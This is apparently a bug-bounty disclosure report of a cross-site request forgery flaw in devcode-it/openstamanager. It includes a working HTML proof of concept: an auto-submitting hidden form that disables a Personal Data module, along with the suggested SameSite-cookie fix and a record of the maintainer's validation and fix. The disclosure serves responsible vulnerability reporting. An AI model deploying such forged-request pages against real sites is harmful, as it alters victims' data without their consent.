We've joined Protect AIJoin us over there for bounties up to $50,000+ for vulnerabilities in AI/ML repos

Cross-Site Request Forgery (CSRF) in devcode-it/openstamanager

Valid

Reported on

Jul 31st 2021

✍️ Description

Attacker able to disable any Personal Data module if users visit attacker site.

🕵️‍♂️ Proof of Concept

1.Open the PoC.html In Firefox or safari.

2.now you can check that Personal data module with id value equal to 1 have been disabled.

// PoC.html

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost:8000/openstamanager/actions.php?id_module=68" method="POST">
      <input type="hidden" name="op" value="disable&#95;widget" />
      <input type="hidden" name="id" value="1" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

💥 Impact

This vulnerability is capable of disabled any Personal data module.

Fix

Set SameSite attribute of cookies to Lax or Strict.

Occurrences

We have contacted a member of the devcode-it/openstamanager team and are waiting to hear back 2 years ago
amammad
2 years ago

Researcher

hey man, I just want to sure you see this report too.

devcode-it/openstamanager maintainer validated this vulnerability 2 years ago
amammad has been awarded the disclosure bounty
The fix bounty is now up for grabs
devcode-it/openstamanager maintainer marked this as fixed with commit 402dca 2 years ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
to join this conversation